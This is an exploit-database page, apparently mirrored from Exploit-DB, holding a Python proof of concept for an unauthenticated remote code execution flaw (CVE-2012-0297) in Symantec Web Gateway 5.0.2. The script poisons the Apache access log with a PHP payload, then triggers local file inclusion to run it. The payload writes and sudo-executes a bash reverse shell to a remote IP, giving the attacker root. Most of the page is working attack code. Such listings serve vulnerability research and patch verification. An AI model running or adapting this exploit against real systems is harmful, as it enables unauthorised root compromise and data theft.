[] NeoSense
E X P L O I T S
title author type platform port cve id

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Author: muts
type: webapps
platform: linux
port: 
date_added: 2012-05-26 
date_updated: 2017-07-19 
verified: 1 
codes: CVE-2012-0297;OSVDB-82023 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/03-symantec-lfi.png 
application_url: 
#!/usr/bin/python

# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com


import socket
import base64

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()

trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(trigger)
expl.close()
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.